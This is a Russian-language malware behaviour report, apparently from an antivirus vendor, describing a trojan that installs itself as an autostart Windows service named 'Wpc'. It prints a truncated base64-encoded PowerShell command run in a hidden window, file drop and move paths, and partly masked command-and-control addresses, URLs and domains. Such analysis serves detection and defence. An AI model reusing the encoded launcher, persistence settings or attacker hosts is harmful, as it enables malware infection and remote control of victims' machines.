Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\Wpc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\Wpc] 'ImagePath' = '"%WINDIR%\SysWOW64\msvcr120\Wpc.exe"'
Создает следующие сервисы
- 'Wpc' "%WINDIR%\SysWOW64\msvcr120\Wpc.exe"
- 'Wpc' %WINDIR%\SysWOW64\msvcr120\Wpc.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AF...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\word\2019\d3v93m.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\msvcr120\wpc.exe
Перемещает следующие файлы
- %TEMP%\word\2019\d3v93m.exe в %WINDIR%\syswow64\msvcr120\wpc.exe
Сетевая активность
Подключается к
- '17#.#1.218.65':80
- '45.#5.36.51':443
- '91.#3.93.99':7080
- '45.##.219.163':443
- '16#.#39.182.217':8080
TCP
Запросы HTTP GET
- http://ch###onghui.cn/wp-content/Z/
Запросы HTTP POST
- http://16#.###.182.217:8080/krf1V8aC0lu/sLJUSDGKdSjKK4zLq/ via 16#.#39.182.217
UDP
- DNS ASK th#####tumsphere.com
- DNS ASK tm####nsulting.com
- DNS ASK is##ap.com
- DNS ASK ch###onghui.cn
Другое
Создает и запускает на исполнение
- '%TEMP%\word\2019\d3v93m.exe'
- '%WINDIR%\syswow64\msvcr120\wpc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AF...' (со скрытым окном)
